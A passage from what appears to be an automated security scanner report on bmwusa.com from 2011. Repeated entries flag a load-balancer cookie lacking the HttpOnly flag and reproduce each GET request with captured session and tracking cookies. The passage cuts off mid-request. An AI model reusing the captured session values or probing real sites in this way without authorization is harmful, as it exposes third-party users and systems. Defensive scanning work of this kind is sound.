Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:28 GMT;path=/
Content-Length: 202171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.288. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:12 GMT;path=/
Content-Length: 214705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.289. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:04 GMT;path=/
Content-Length: 227207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.290. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:10:42 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:10:42 GMT;path=/
Content-Length: 227208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.291. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:01 GMT;path=/
Content-Length: 215752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.292. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:25 GMT;path=/
Content-Length: 215753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.293. http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/5explore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/5explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:39 GMT;path=/
Content-Length: 180004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.294. http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/5granturismoexplore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:42 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/5granturismoexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:42 GMT;path=/
Content-Length: 180239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.295. http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:31 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:31 GMT;path=/
Content-Length: 202396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.296. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:36 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:36 GMT;path=/
Content-Length: 202156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.297. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:36 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:36 GMT;path=/
Content-Length: 212832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.298. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:24 GMT;path=/
Content-Length: 212833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.299. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:27:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:07:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:27:21 GMT;path=/
Content-Length: 227187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.300. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:47 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
